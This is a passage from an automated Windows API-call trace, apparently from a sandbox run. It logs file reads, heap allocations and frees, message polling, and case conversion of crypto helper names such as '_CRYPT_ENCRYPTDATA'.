lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0xc29d, lpOverlapped=0x0) returned 1 [0102.788] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0102.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0102.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0102.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0102.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0102.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc29d) returned 0x4516010 [0102.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e00020 | out: hHeap=0x1780000) returned 1 [0102.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0102.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0102.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0102.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0102.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0102.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc29d) returned 0x45222b8 [0102.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0102.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0102.793] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0102.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0102.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0102.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0102.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0102.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc29d) returned 0x4516010 [0102.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0102.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0102.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0102.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0102.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0102.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0102.793] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0102.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0102.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0102.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0102.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0102.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0102.793] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0102.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0102.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0102.794] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0102.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0102.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0102.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0102.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a00 [0102.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0102.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0102.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0102.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0102.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc29d) returned 0x4516010 [0102.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0102.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a60 [0102.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0102.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0102.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2950 [0102.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0102.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0102.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2b10 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0102.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca970 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc29d) returned 0x452e560 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0102.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0102.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0102.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0102.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0102.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0102.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0102.796] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0102.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0102.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0102.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0102.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0102.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0102.796] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0102.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0102.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0102.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0102.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0102.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0102.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0102.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0102.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0102.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0102.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0102.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0102.797] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0102.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0102.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0102.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a30 [0102.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0102.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0102.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0102.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0102.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0102.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0102.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0102.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0102.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0102.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0102.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0102.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0102.797] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0102.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0102.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0102.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0102.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0102.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0102.798] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0102.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0102.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0102.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0102.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0102.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0102.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0102.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0102.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0102.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0102.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0102.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0102.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0102.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0102.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0102.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0102.799] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0102.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0102.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0102.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0102.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0102.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0102.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0102.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0102.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0102.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0102.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0102.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0102.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0102.800] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0102.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0102.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0102.800] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0102.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0102.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0102.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0102.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0102.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0102.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0102.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0102.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0102.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0102.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0102.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0102.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0102.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0102.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0102.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0102.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0102.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0102.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0102.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0102.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0102.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0102.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0102.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0102.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0102.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0102.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0102.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0102.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0102.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0102.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0102.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0102.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0102.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0102.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0102.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0102.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0102.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0102.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0102.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0102.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0102.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0102.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0102.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0102.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0102.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0102.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0102.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0102.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0102.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0102.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0102.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0102.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0102.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0102.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0102.803] HeapFree (in: 